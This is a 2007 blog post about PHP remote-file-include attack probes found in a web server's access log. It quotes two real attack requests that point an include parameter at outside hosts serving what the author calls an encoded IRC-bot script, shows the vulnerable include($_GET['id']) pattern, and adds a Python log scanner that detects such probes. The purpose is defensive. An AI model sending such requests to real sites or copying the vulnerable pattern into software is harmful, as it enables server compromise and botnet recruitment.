Sat, 06 Oct 2007

php include hack?

I happened to be watching a log file while testing something and noticed the following type of request go by:

217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"

85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"


Which was interesting, as it's obviously some type of hack attempt. I decided to look into it, and it seems to be a scripted attempt to pass the URL to any script that accepts a variable, in the hope that someone was silly enough to use that variable as an include and happened to have remote includes turned on in their PHP config, something like this:

<?php
// The vulnerable pattern the probes are looking for: a request parameter
// used directly as an include path. With remote includes enabled in php.ini
// (allow_url_fopen / allow_url_include), ?id=http://... makes PHP fetch
// and execute the remote file.
$id = $_GET['id'];   // or $id populated automatically via register_globals
include($id);
// rest of script
?>


Then when the page is called, the URL is passed in as the include and the remote script gets executed. It seems to be some type of IRC bot, although the file is all encoded to help hide what exactly is going on; I'm sure you end up in some botnet ultimately. And from what I read it's not uncommon for people to actually have a page set up like that for redirects or some such nonsense. Obviously not a good practice, as you'd likely end up a victim of this request.
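Since these probes stand out in the access log before they stand out anywhere else, here is a small detector for them. This is an added example, not code from the post: it parses Apache combined-format lines and flags any query parameter whose (decoded) value starts with a URL scheme, which is the shape of a remote-include probe. The sample log is the two requests quoted above plus one constructed benign request.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/NCSA combined log line: client, ident, user, [timestamp], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query parameter whose value begins with a scheme. Applied to the decoded query so that
# id=http%3A%2F%2F... is caught too, and to the raw query so nested "?id=" tricks are caught.
REMOTE_PARAM_RE = re.compile(
    r'(?:^|[&?;])(?P<param>[^=&?;]+)=(?P<url>(?:https?|ftp)://[^&\s]*)', re.IGNORECASE
)

def find_rfi_probe(line):
    """Return details of a remote-include probe in one log line, or None if the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote(urlsplit(m.group('target')).query)
    hit = REMOTE_PARAM_RE.search(query)
    if not hit:
        return None
    # The trailing '?' the probes append stays attached to the URL; hostname() ignores it.
    return {
        'client': m.group('ip'),
        'param': hit.group('param'),
        'remote_host': urlsplit(hit.group('url')).hostname,
        'remote_url': hit.group('url'),
        'status': int(m.group('status')),   # a 200 here means the app served *something* back
        'user_agent': m.group('ua'),
    }

def scan(lines):
    """Run find_rfi_probe over an iterable of log lines and keep the hits."""
    return [p for p in (find_rfi_probe(line) for line in lines) if p]

# The two requests from the post, plus one constructed benign request (192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    '217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"',
    '85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"',
    '192.0.2.10 - - [06/Oct/2007:01:05:00 -0400] "GET /pictures/index.php?id=830 HTTP/1.1" 200 1435 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for probe in scan(SAMPLE_LOG):
        print(f"{probe['client']} -> {probe['param']}={probe['remote_url']} "
              f"(status {probe['status']}, UA {probe['user_agent']})")
```

A hit with status 200 is the one to chase: check whether the script actually fetched the remote file (outbound connections from the web server, or the include appearing in the PHP error log).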

Here is a copy of the scripts from the above two examples, hosted locally, as I doubt they'll be around forever on those hosts: cs.txt & cmd.txt

posted at: 02:45 | path: /security | permanent link to this entry

